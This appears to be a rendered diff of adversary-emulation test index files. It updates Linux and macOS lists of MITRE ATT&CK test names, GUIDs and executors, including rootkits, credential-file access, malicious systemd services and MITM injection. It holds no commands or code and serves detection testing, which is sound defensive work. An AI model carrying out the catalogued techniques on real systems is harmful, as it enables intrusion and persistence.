2226 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
2227 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
2228 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
initial-access T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
initial-access T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
2229 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
2230 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
2231 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
atomics/Indexes/Indexes-CSV/linux-index.csv
+3 -23
View File
@@ -18,7 +18,6 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -156,7 +155,8 @@ persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron s
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
@@ -181,8 +181,6 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -196,8 +194,6 @@ persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1568.002,Dynamic Resolution: Domain Generation Algorithms,1,DGA Simulation (Python),cc367493-3a00-4c4a-a685-16b73339167c,bash
command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
@@ -275,8 +271,6 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -338,8 +332,6 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
discovery,T1087.002,Account Discovery: Domain Account,24,Account Enumeration with LDAPDomainDump,a54d497e-8dbe-4558-9895-44944baa395f,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
@@ -352,7 +344,6 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtu
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
@@ -378,9 +369,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
@@ -409,14 +398,6 @@ execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with refer
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1569.003,System Services: Systemctl,1,Create and Enable a Malicious systemd Service Unit,e58c8723-5503-4533-b642-535cd20ec648,sh
execution,T1569.003,System Services: Systemctl,2,Create systemd Service Unit from /tmp (Unusual Location),a1fa406e-2354-4a24-b6d6-94157e7564d4,sh
execution,T1569.003,System Services: Systemctl,3,Create systemd Service Unit from /dev/shm (Unusual Location),dce49381-a26b-4d95-bdfa-c607ffe8bee5,sh
execution,T1569.003,System Services: Systemctl,4,Modify Existing systemd Service to Execute Malicious Command,6123928f-6389-4914-8d25-a5d69bd657fa,sh
execution,T1569.003,System Services: Systemctl,5,Execute Command via Transient systemd Service (systemd-run),a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236,sh
execution,T1569.003,System Services: Systemctl,6,Enumerate All systemd Services Using systemctl,1e5be8d4-605a-4acb-8709-2f80b2d8ea95,sh
execution,T1569.003,System Services: Systemctl,7,Enable systemd Service for Persistence with Auto-Restart,2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7,sh
execution,T1569.003,System Services: Systemctl,8,Masquerade Malicious Service as Legitimate System Service,6fec8560-ff64-4bbf-bc79-734fea48f7ca,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
@@ -464,7 +445,6 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
18 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 14 Chown through c script (freebsd) eb577a19-b730-4918-9b03-c5edcf51dc4e sh
19 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 1 Decode Eicar File and Write to File 7693ccaa-8d64-4043-92a5-a2eb70359535 powershell
20 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 2 Decrypt Eicar File and Write to File b404caaa-12ce-43c7-9214-62a531c044f7 powershell
defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 3 Password-Protected ZIP Payload Extraction and Execution c2ca068a-eb1e-498f-9f93-3d554c455916 bash
21 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
22 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
23 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
155 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
156 persistence T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
157 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
158 persistence T1176 Browser Extensions 2 Firefox Chrome/Chromium (Chrome Web Store) cb790029-17e6-4c43-b96f-002ce5f10938 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
159 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
160 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
161 persistence T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
162 persistence T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
181 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
182 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
183 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 3 Python Startup Hook - atomic_hook.pth (Linux) a58c066d-f2f0-42a2-ab70-30af73f89e66 sh
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
184 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
185 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
186 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
194 persistence T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
195 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
196 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
command-and-control T1568.002 Dynamic Resolution: Domain Generation Algorithms 1 DGA Simulation (Python) cc367493-3a00-4c4a-a685-16b73339167c bash
command-and-control T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
197 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
198 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
199 command-and-control T1572 Protocol Tunneling 7 Cloudflare tunnels (Linux/macOS) 228c336a-2f79-4043-8aef-bfa453a611d5 sh
271 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
272 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
273 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 3 Python Startup Hook - atomic_hook.pth (Linux) a58c066d-f2f0-42a2-ab70-30af73f89e66 sh
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
274 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
275 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
276 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
332 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 5 Access /etc/{shadow,passwd,master.passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 sh
333 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
334 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 2 Check internet connection using ping freebsd, linux or macos be8f4019-d8b6-434c-a814-53123cdcc11e bash
discovery T1652 Device Driver Discovery 2 Device Driver Discovery (Linux) d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1 bash
discovery T1652 Device Driver Discovery 3 Enumerate Kernel Driver Files (Linux) 13c0fef5-9be9-4d7f-9c6b-901624e53770 bash
335 discovery T1087.002 Account Discovery: Domain Account 23 Active Directory Domain Search 096b6d2a-b63f-4100-8fa0-525da4cd25ca sh
336 discovery T1087.002 Account Discovery: Domain Account 24 Account Enumeration with LDAPDomainDump a54d497e-8dbe-4558-9895-44944baa395f sh
337 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
344 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
345 discovery T1069.002 Permission Groups Discovery: Domain Groups 15 Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS d58d749c-4450-4975-a9e9-8b1d562755c2 sh
346 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl/service f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
discovery T1007 System Service Discovery 8 System Service Discovery - Linux init scripts 8f2a5d2b-4018-46d4-8f3f-0fea53754690 sh
347 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
348 discovery T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
349 discovery T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
369 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
370 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
371 discovery T1083 File and Directory Discovery 8 Identifying Network Shares - Linux 361fe49d-0c19-46ec-a483-ccb92d38e88e sh
372 discovery T1049 System Network Connections Discovery 4 3 System Network Connections Discovery via ss or lsof (Linux/MacOS) System Network Connections Discovery FreeBSD, Linux & MacOS bcf05343-ef1d-4052-8a27-b00c9be42b9f 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 bash sh
discovery T1049 System Network Connections Discovery 5 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
discovery T1049 System Network Connections Discovery 6 System Network Connections Discovery via sockstat (Linux, FreeBSD) 997bb0a6-421e-40c7-b5d2-0f493904ef9b sh
373 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
374 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
375 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
398 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
399 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
400 execution T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
execution T1569.003 System Services: Systemctl 1 Create and Enable a Malicious systemd Service Unit e58c8723-5503-4533-b642-535cd20ec648 sh
execution T1569.003 System Services: Systemctl 2 Create systemd Service Unit from /tmp (Unusual Location) a1fa406e-2354-4a24-b6d6-94157e7564d4 sh
execution T1569.003 System Services: Systemctl 3 Create systemd Service Unit from /dev/shm (Unusual Location) dce49381-a26b-4d95-bdfa-c607ffe8bee5 sh
execution T1569.003 System Services: Systemctl 4 Modify Existing systemd Service to Execute Malicious Command 6123928f-6389-4914-8d25-a5d69bd657fa sh
execution T1569.003 System Services: Systemctl 5 Execute Command via Transient systemd Service (systemd-run) a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236 sh
execution T1569.003 System Services: Systemctl 6 Enumerate All systemd Services Using systemctl 1e5be8d4-605a-4acb-8709-2f80b2d8ea95 sh
execution T1569.003 System Services: Systemctl 7 Enable systemd Service for Persistence with Auto-Restart 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7 sh
execution T1569.003 System Services: Systemctl 8 Masquerade Malicious Service as Legitimate System Service 6fec8560-ff64-4bbf-bc79-734fea48f7ca sh
401 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
402 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
403 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
445 impact T1529 System Shutdown/Reboot 10 Reboot System via `poweroff` - FreeBSD 5a282e50-86ff-438d-8cef-8ae01c9e62e1 sh
446 impact T1529 System Shutdown/Reboot 11 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
447 impact T1529 System Shutdown/Reboot 16 Abuse of Linux Magic System Request Key for Reboot d2a1f4bc-a064-4223-8281-a086dce5423c bash
initial-access T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
448 initial-access T1195.002 Compromise Software Supply Chain 1 Simulate npm package installation on a Linux system a9604672-cd46-493b-b58f-fd4124c22dd3 bash
449 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
450 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
atomics/Indexes/Indexes-CSV/macos-index.csv
+4 -14
View File
@@ -12,7 +12,6 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -95,8 +94,9 @@ defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing us
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
